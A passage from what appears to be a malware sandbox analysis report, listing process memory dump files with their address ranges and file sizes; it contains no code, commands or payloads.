                                                            Filesize

                                                            4KB

                                                          • memory/4756-188-0x0000000000000000-mapping.dmp

                                                          • memory/4932-298-0x0000000000000000-mapping.dmp

                                                          • memory/5028-114-0x0000000000400000-0x0000000000409000-memory.dmp

                                                            Filesize

                                                            36KB

                                                          • memory/5028-115-0x0000000000402FAB-mapping.dmp

                                                          • memory/5048-210-0x000000001D3D0000-0x000000001D3D2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/5048-209-0x0000000020140000-0x000000002079A000-memory.dmp

                                                            Filesize

                                                            6.4MB

                                                          • memory/5048-203-0x0000000000480000-0x0000000000481000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/5048-200-0x0000000000000000-mapping.dmp

                                                          • memory/5048-295-0x000000001D310000-0x000000001D369000-memory.dmp

                                                            Filesize

                                                            356KB

                                                          • memory/5048-290-0x000000001E7E0000-0x000000001E7E1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/5048-289-0x000000001D3D5000-0x000000001D3D7000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/5048-255-0x000000001D3D4000-0x000000001D3D5000-memory.dmp

                                                            Filesize

                                                            4KB

                                                          • memory/5048-247-0x000000001D3D2000-0x000000001D3D4000-memory.dmp

                                                            Filesize

                                                            8KB